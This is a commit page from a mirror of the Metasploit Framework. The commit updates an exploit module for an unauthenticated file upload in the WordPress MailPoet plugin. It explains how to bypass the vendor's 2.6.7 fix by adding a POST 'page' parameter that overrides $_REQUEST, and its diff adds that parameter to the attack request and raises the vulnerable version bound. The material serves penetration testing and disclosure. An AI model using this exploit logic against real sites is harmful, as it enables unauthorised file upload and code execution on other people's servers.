infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #3494, @Firefart's update for Mailpoet's exploit

bug/bundler_fix
jvazquez-r7 2014-07-06 11:27:18 -05:00
parent cf5d29c53b d5843f8eaf
commit 5e7f356f31
No known key found for this signature in database
GPG Key ID: 38D99152B9352D83
1 changed files with 13 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

18
modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb
View File

@ -15,11 +15,16 @@ class Metasploit3 < Msf::Exploit::Remote
super(update_info(info,
'Name' => 'Wordpress MailPoet (wysija-newsletters) Unauthenticated File Upload',
'Description' => %q{
The Wordpress plugin "MailPoet Newsletters" (wysija-newsletters) before 2.6.7
The Wordpress plugin "MailPoet Newsletters" (wysija-newsletters) before 2.6.8
is vulnerable to an unauthenticated file upload. The exploit uses the Upload Theme
functionality to upload a zip file containing the payload. The plugin used the
admin_init hook, which is also executed for unauthenticated users when accessing
a specific URL.
a specific URL. The developers tried to fix the vulnerablility
in version 2.6.7 but the fix can be bypassed. In PHPs default configuration,
a POST variable overwrites a GET variable in the $_REQUEST array. The plugin
uses $_REQUEST to check for access rights. By setting the POST parameter to
something not beginning with 'wysija_', the check is bypassed. Wordpress uses
the $_GET array to determine the page and is so not affected by this.
},
'Author' =>
[
@ -29,12 +34,14 @@ class Metasploit3 < Msf::Exploit::Remote
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://blog.sucuri.net/2014/07/remote-file-upload-vulnerability-on-mailpoet-wysija-newsletters.html' ]
[ 'URL', 'http://blog.sucuri.net/2014/07/remote-file-upload-vulnerability-on-mailpoet-wysija-newsletters.html' ],
[ 'URL', 'http://www.mailpoet.com/security-update-part-2/'],
[ 'URL', 'https://plugins.trac.wordpress.org/changeset/943427/wysija-newsletters/trunk/helpers/back.php']
],
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' => [ ['wysija-newsletters < 2.6.7', {}] ],
'Targets' => [ ['wysija-newsletters < 2.6.8', {}] ],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jul 1 2014'))
end
@ -81,7 +88,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("#{peer} - Found version #{version} of the plugin")
if Gem::Version.new(version) < Gem::Version.new('2.6.7')
if Gem::Version.new(version) < Gem::Version.new('2.6.8')
return Msf::Exploit::CheckCode::Appears
else
return Msf::Exploit::CheckCode::Safe
@ -101,6 +108,7 @@ class Metasploit3 < Msf::Exploit::Remote
data.add_part('on', nil, nil, 'form-data; name="overwriteexistingtheme"')
data.add_part('themeupload', nil, nil, 'form-data; name="action"')
data.add_part('Upload', nil, nil, 'form-data; name="submitter"')
data.add_part(rand_text_alpha(10), nil, nil, 'form-data; name="page"')
post_data = data.to_s
payload_uri = normalize_uri(target_uri.path, 'wp-content', 'uploads', 'wysija', 'themes', theme_name, payload_name)